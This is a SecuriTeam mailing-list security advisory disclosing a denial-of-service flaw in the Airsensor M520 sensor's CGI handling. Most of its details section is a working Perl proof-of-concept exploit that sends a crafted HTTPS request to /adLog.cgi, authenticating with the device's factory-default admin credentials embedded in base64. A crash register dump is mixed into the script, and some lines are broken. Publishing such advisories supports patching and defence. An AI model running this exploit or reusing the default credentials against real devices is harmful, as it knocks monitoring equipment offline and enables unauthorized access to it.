The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
SUMMARY
A vulnerability in Airsensor M520 is caused due to an unspecified error in
the CGIs files filter used for configure proprieties. This can be
exploited by sending a specially crafted HTTPS request (necessary
authentication), which will cause the HTTPS service on the system to
crash.
DETAILS
Exploit:
#!/usr/bin/perl -w
Overflow PoC
Model = M520
Instruction)
v0=0x00000000 v1=0x00000000
a2=0x00000010 a3=0x00000041
t2=0x0000000b t3=0x00000000
t6=0x0066a1a4 t7=0x4df0e494
s2=0x802f7910 s3=0x80120000
s6=0x80120000 s7=0x80128afc
k0=0x802f78c8 k1=0x802f7910
fp=0x80128aec ra=0x800b2534
exception = 0x800b2534
exception occured = 0x00000000
address
address
use strict;
use LWP;
use Data::Dumper;
require HTTP::Request;
require HTTP::Headers;
my $string = "%41%41%41"; # Strings to send
my $method = 'GET'; # Method "GET" or "POST"
my $uri = 'https://192.168.100.100'; # Factory default IP address
my $content = "/adLog.cgi?"; # Cgi's file to crash
#my $content = "/ad.cgi?";
#my $content = "/post.cgi?";
#my $content = "/logout.cgi?";
my $headers = HTTP::Headers->new(
'Host:' => '192.168.100.100',
'User-Agent:' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',
'Accept:' =>
'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5',
'Accept-Language:' => 'en-us,en;q=0.5',
'Accept-Charset:' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive:' => '300',
'Connection:' => 'keep-alive',
'Referer:' =>
'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh',
'Authorization:' => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode
admin:airsensor
);
my $request = HTTP::Request->new($method, $uri, $headers, $content,
$string);
my $ua = LWP::UserAgent->new;
my $response = $ua->request($request);
print "[+] Denial of Service exploit for Airsensor M520 Final\n";
print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n";
print "[+] We got this response from sensor: \n\n" . $response->content .
"\n";
my $data;
foreach my $pair (split('&', $response->content)) {
my ($k, $v) = split('=', $pair);
$data->{$k} = $v;
}
if ($data->{RESULT} != 0) {
print "[+] Denial of Service exploit for Airsensor M520 Final\n";
print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n";
print "[+] Use:\n";
print "\tperl -x dos_sensor.pl\n";
print $data->{RESPMSG} . "\n";
exit(0);
} else {
print "[+] Denial of service Exploit successed!!!\n";
print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n";
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]>
Alex Hernandez.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.